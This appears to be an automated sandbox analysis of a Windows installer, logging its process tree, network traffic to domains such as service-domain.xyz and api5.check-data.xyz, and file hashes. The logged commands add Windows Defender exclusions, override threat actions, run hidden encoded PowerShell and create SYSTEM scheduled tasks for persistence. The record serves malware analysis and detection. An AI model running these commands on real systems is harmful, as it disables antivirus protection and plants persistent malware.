schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe\" sw /site_id 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe sw /site_id 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gVvOoVbVA" /SC once /ST 02:07:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gVvOoVbVA"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gVvOoVbVA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 00:28:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe\" VS /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTlmQXMDCFpnewAuq"

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe VS /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\jsSbxq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\GasXUvu.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\QzjBmRy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\ntStZTp.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\fXwrAtP.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\ircnoIG.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 04:15:34 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\LUUVSPHV\nDkOWwT.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "dBpreMcpfXbehynYz"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\LUUVSPHV\nDkOWwT.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\LUUVSPHV\nDkOWwT.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 addons.mozilla.org udp
US 151.101.193.91:80 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 8.8.8.8:53 91.193.101.151.in-addr.arpa udp
US 151.101.193.91:80 addons.mozilla.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 api5.check-data.xyz udp
US 35.162.118.53:80 api5.check-data.xyz tcp
US 8.8.8.8:53 53.118.162.35.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe

MD5 3b76af9e2510171d3739b8bc9ee2ee68
SHA1 4c8148a587ba7e6de8963c2d4dbbcceac39b3694
SHA256 3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768
SHA512 d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94

C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe

MD5 ad10a30760d467dade24f430b558b465
SHA1 7aaa56e80264c27d080c3b77055294593eacca1b
SHA256 44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a
SHA512 23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63

memory/1612-13-0x0000000010000000-0x0000000010F04000-memory.dmp

memory/4284-16-0x00000245FA070000-0x00000245FA092000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4hmbvn5.ozs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4600-34-0x0000000010000000-0x0000000010F04000-memory.dmp

memory/2936-36-0x0000000003D60000-0x0000000003D96000-memory.dmp

memory/2936-37-0x0000000004510000-0x0000000004B38000-memory.dmp

memory/2936-38-0x0000000004380000-0x00000000043A2000-memory.dmp

memory/2936-39-0x0000000004BB0000-0x0000000004C16000-memory.dmp

memory/2936-40-0x0000000004C90000-0x0000000004CF6000-memory.dmp

memory/2936-50-0x0000000004E40000-0x0000000005194000-memory.dmp

memory/2936-51-0x0000000005300000-0x000000000531E000-memory.dmp

memory/2936-52-0x0000000005920000-0x000000000596C000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 65b634578f1dd422bd95cf98e51e8512
SHA1 da460aea4116d99ba12b322df359e00e28eb2db4
SHA256 817f4d7d2b4c933446868091a0dc00420551af79840fe3a88d7c2f29301c53bd
SHA512 4e752f2db60844bd124ca786453237bc19d6c9e73290bad55300b313127c4efe3c15c6c856ecc36273312901f6fe2b0abbf21dfe40560f74f9c7c267c847e3bd

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

